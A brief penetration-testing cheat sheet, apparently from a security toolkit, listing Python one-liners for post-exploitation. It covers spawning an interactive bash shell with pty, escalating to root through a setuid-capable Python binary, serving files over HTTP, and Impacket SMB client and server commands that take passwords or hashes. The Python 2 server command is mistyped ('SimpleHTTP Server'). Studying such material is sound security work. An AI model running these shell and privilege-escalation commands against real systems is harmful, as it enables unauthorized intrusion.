# Python

Getting **interactive shells** after exploit

```
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Escalate privileges if root user capability is set on Python binary ([1](https://doubtfulturnip.gitbook.io/dts-cybersecurity-tool-kit/guides/quick-reference/linux-shell),[2](https://doubtfulturnip.gitbook.io/dts-cybersecurity-tool-kit/guides/specific-techniques/post-exploit))

```
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

The following will start a webserver in the present working directory using Python2.

```
python -m SimpleHTTP Server 80
```

The following will start a webserver in the present working directory using Python3.

```
python3 -m http.server 80
```

#### Using Python Impacket - <https://github.com/SecureAuthCorp/impacket>

SMB Client

```
smbclient.py [domain]/[user]:[password/password hash]@[Target IP Address]
```

SMB Server

```
smbserver.py [shareName] -smb2support -user <user> -p <password>
```